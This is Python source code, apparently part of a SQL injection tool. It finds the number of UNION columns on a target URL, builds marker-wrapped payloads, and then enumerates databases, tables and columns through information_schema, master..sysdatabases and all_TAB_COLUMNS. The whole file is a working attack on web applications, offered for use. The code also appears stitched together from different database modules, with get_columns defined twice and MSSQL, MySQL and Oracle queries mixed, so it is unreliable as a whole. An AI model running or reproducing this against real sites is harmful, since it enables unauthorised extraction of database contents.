def set_actual_boundary(self):
is_set = False
token = '10000'
table_name = "information_schema.schemata"
self.set_query(SQL.query)
l = ["NULL"] * 25
for i in range(25):
temp = copy.deepcopy(l)
temp[i] = token
col_name = [','.join(temp[:i + 1])]
payload, _ = self.get_payload(table_name, col_name)
url = conf.url
res = req.connection(url, payload)
text = res.text
if token in text:
break
l = ["NULL"] * 3
token = format_hex(random_str())
for i in range(len(l)):
pack = copy.deepcopy(l)
pack[i] = token
col_name = [','.join(pack)]
payload, _ = self.get_payload(table_name, col_name)
url = conf.url
res = req.connection(url, payload)
text = res.text
if un_hex(token) in text:
boudary = payload.replace(
token, "concat(0x3a2d2d3a,%query,0x3a2d2d3a)")
self.ini_boundary = boudary
self.set_boundary(boudary)
is_set = True
break
if not is_set:
logger.error("Set Boundary Error!!!")
sys.exit(0)
def get_dbs(self):
table_name = 'master..sysdatabases'
col_name = ["name"]
self.set_query(SQL.query)
counts = self.get_counts(table_name, col_name)
logger.info("all dbs counts is :%s" % counts)
self.reset_query()
dbs = []
for i in range(1, int(counts) + 1):
payload, token = self.get_payload(table_name, col_name, str(i))
url = conf.url
res = req.connection(url, payload=payload)
db = self.get_value_from_response(res.text, token)
dbs.append(db)
logger.info("Ent:" + db)
return dbs
def get_columns(self, db, table):
table_name = 'information_schema.columns'
col_name = ["column_name"]
query = SQL.query_col.replace("{db}", format_hex(db)).replace(
"{table}", format_hex(table))
self.set_query(query)
counts = self.get_counts(table_name, col_name)
columns = []
for i in range(int(counts)):
payload, token = self.get_payload(table_name, col_name, str(i))
url = conf.url
res = req.connection(url, payload=payload)
col = self.get_value_from_response(res.text, token)
columns.append(col)
logger.info("Ent:" + col)
return columns
def get_tables(self, db):
table_name = 'information_schema.tables'
col_name = ["table_name"]
query = SQL.query_tab.replace("{db}", format_hex(db))
self.set_query(query)
counts = self.get_counts(table_name, col_name)
logger.info("all dbs counts is :%s" % counts)
tables = []
for i in range(int(counts)):
payload, token = self.get_payload(table_name, col_name, str(i))
url = conf.url
res = req.connection(url, payload=payload)
table = self.get_value_from_response(res.text, token)
tables.append(table)
logger.info("Ent:" + table)
return tables
def get_columns(self, db, table):
table_name = 'all_TAB_COLUMNS'
col_name = ["column_name"]
query = SQL.query_all_col.replace("{db}", "'{0}'").replace(
"{table}", "'{1}'").format(db, table)
self.set_query(query)
counts = self.get_counts(table_name, col_name)
query = SQL.query_col.replace("{db}", "'{0}'").replace(
"{table}", "'{1}'").format(db, table)
self.set_query(query)
columns = []
for i in range(1, int(counts) + 1):
payload, token = self.get_payload(table_name, col_name, str(i))
url = conf.url
res = req.connection(url, payload=payload)
col = self.get_value_from_response(res.text, token)
columns.append(col)
logger.info("Ent:" + col)
return columns